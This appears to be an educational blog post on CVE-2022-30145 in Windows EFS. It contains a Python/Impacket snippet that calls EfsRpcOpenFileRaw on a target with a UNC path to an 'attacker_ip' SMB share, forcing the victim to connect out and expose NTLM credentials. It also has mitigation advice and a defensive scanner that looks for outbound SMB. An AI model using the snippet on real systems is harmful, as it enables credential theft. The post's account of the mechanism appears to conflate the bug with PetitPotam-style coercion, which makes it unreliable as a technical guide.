In June 2022, Microsoft patched a critical security vulnerability known as CVE-2022-30145, which targeted the Windows Encrypting File System (EFS). This flaw allowed attackers to potentially execute code remotely, threatening the confidentiality and security of encrypted files on Windows systems. If you use Windows in a professional or personal environment, understanding this vulnerability is essential to keep your data safe.
This post will discuss what EFS is, how CVE-2022-30145 works, provide sample code, review available resources, and walk through an example exploitation scenario—using clear language for everyone to understand.
What is EFS (Encrypting File System)?
EFS stands for Encrypting File System, a built-in feature in Windows that helps users store encrypted files on an NTFS file system. It’s different from BitLocker (which encrypts whole volumes), as EFS lets you encrypt specific files or folders.
With EFS, only authorized users or applications can read the protected files. However, a bug in the system—like CVE-2022-30145—opens the door for attackers to bypass these protections.
Patched on: June 2022 Patch Tuesday
Reference:
- Microsoft Security Guide
- NIST NVD Entry
What Could Attackers Do?
Attackers could run code on your machine without you realizing it. For example, they could create or replace files, steal information, or modify your system.
How Does the Attack Work?
The vulnerability exists in how EFS, through a network protocol named MS-EFSR, handles specially crafted requests. If an attacker can reach your Windows system over the network, usually through SMB (Server Message Block) file sharing, they can trigger this bug remotely.
1. Where’s the Vulnerability?
The MS-EFSR (Microsoft Encrypting File System Remote) protocol exposes functions that can be called over the network; the one most often abused is EfsRpcOpenFileRaw, a method used to remotely read or write encrypted files.
The vulnerability is typically exploited by calling this function with a crafted argument, yielding code execution with the privileges of the EFS service, usually LOCAL_SYSTEM. The chain looks like this:
1. The attacker sends an EfsRpcOpenFileRaw request whose file path points to an SMB share on a remote server the attacker controls.
2. The request causes EFS on the victim to try to access that file on the attacker's (malicious) remote SMB share.
3. The victim system connects to the attacker's SMB server, exposing its NTLM credentials, or triggering a series of calls that can be abused for code execution.
2. Code Snippet (Example Exploit Skeleton)
To demonstrate, here’s a *simplified* Python snippet using Impacket that triggers a similar call. Warning: This is for educational purposes only.
```python
from impacket.dcerpc.v5 import transport, efsrpc

target_ip = "192.168.1.100"
username = "victimuser"
password = "victimpass"
domain = "VICTIM"

# Create a DCERPC connection to the EFSR interface over the efsrpc named pipe
string_binding = r'ncacn_np:{}[\PIPE\efsrpc]'.format(target_ip)
rpctransp = transport.DCERPCTransportFactory(string_binding)
rpctransp.set_credentials(username, password, domain, '', '')
dce = rpctransp.get_dce_rpc()
dce.connect()
dce.bind(efsrpc.MSRPC_UUID_EFSR)

# Path can be a UNC path to the attacker's server.
malicious_path = '\\\\attacker_ip\\share\\file.txt'

# Try to open the file raw (this triggers the vulnerability)
efsrpc.hEfsRpcOpenFileRaw(dce, malicious_path)
print("Request sent. If successful, victim tries to access the attacker's SMB share.")
```
*Note: This does not execute code directly but shows how EfsRpcOpenFileRaw can be misused to make a victim's machine initiate outbound connections. Full RCE chains may involve more steps.*
Real-World Impact and Research
The original bug was notable because it could be exploited without user interaction. Since the EFS service runs as LOCAL_SYSTEM, successful exploits could grant attackers full control of the system.
Security researchers like James Forshaw and *impacket* developer SecureAuth have published related tools and analysis, especially after the earlier PetitPotam (CVE-2021-36942) technique, which is similar but not identical.
Mitigation & Recommendations
- Patch Now: If you haven’t updated Windows since June 2022, do it now! The fix closes this door.
- Network Segmentation: Don't expose Windows file shares or EFS services to untrusted networks.
- Firewall Rules: Block inbound access to ports 445/TCP (SMB), or limit to trusted IPs.
- Disable EFS if Not Needed: Consider Group Policy settings to disable EFS if your organization doesn’t use it.
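The tell-tale sign of the attack chain above is the victim server itself opening an outbound SMB connection to a host it has no business talking to. The following is an added example, not part of the original post or of any vendor tool, showing how a defender might screen firewall or flow logs for that behaviour. The log format, the internal address ranges, the list of known SMB servers and the sample lines (which use documentation addresses) are all assumptions constructed for the example.

```python
import ipaddress
from typing import NamedTuple

# Constructed sample flow-log lines (not real traffic):
# "<timestamp> <src_ip> <src_port> <dst_ip> <dst_port> <proto> <action>"
SAMPLE_LOG = """\
2022-06-20T10:01:02Z 10.0.5.21 50322 10.0.5.10 445 tcp allow
2022-06-20T10:01:05Z 10.0.5.21 50323 203.0.113.7 445 tcp allow
2022-06-20T10:01:09Z 10.0.5.33 50990 10.0.9.200 445 tcp allow
2022-06-20T10:01:11Z 10.0.5.21 50400 10.0.5.10 443 tcp allow
this line is malformed and must be skipped
2022-06-20T10:01:15Z 10.0.5.40 51000 198.51.100.25 139 tcp allow
"""

# Assumed: RFC 1918 ranges are "internal" for this network.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Assumed: hosts that legitimately serve SMB (file servers, DCs).
KNOWN_SMB_SERVERS = {ipaddress.ip_address("10.0.5.10")}
SMB_PORTS = {445, 139}


class Finding(NamedTuple):
    timestamp: str
    src: str
    dst: str
    dst_port: int
    reason: str


def is_internal(ip) -> bool:
    """True if the address falls inside one of the assumed internal ranges."""
    return any(ip in net for net in INTERNAL_NETS)


def find_suspicious_smb(log_text: str, known_servers=KNOWN_SMB_SERVERS) -> list:
    """Return allowed TCP flows to SMB ports that go somewhere unexpected."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue  # malformed line: skip rather than crash the scan
        ts, src, _sport, dst, dport, proto, action = fields
        if proto != "tcp" or action != "allow" or int(dport) not in SMB_PORTS:
            continue
        dst_ip = ipaddress.ip_address(dst)
        if not is_internal(dst_ip):
            reason = "outbound SMB to external host (possible coerced authentication)"
        elif dst_ip not in known_servers:
            reason = "SMB to internal host that is not a known file server"
        else:
            continue  # expected traffic to a known server
        findings.append(Finding(ts, src, dst, int(dport), reason))
    return findings
```

Run over the sample, the scan flags the two flows to external addresses and the one to an unknown internal host, while the flow to the known file server and the non-SMB flow pass.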
Conclusion
CVE-2022-30145 is a serious vulnerability in Windows Encrypting File System's remote protocol. It allows attackers to execute code over the network, potentially taking complete control. With network attacks like these, patching quickly and limiting exposure is vital.
Further Reading
- Microsoft’s KB5004476 Security Update
- Original NVD Entry (US-CERT)
- Impacket GitHub
Stay safe. Keep your Windows systems updated and monitor your network for unusual outbound SMB traffic!
Timeline
Published on: 06/15/2022 22:15:00 UTC
Last modified on: 06/25/2022 02:21:00 UTC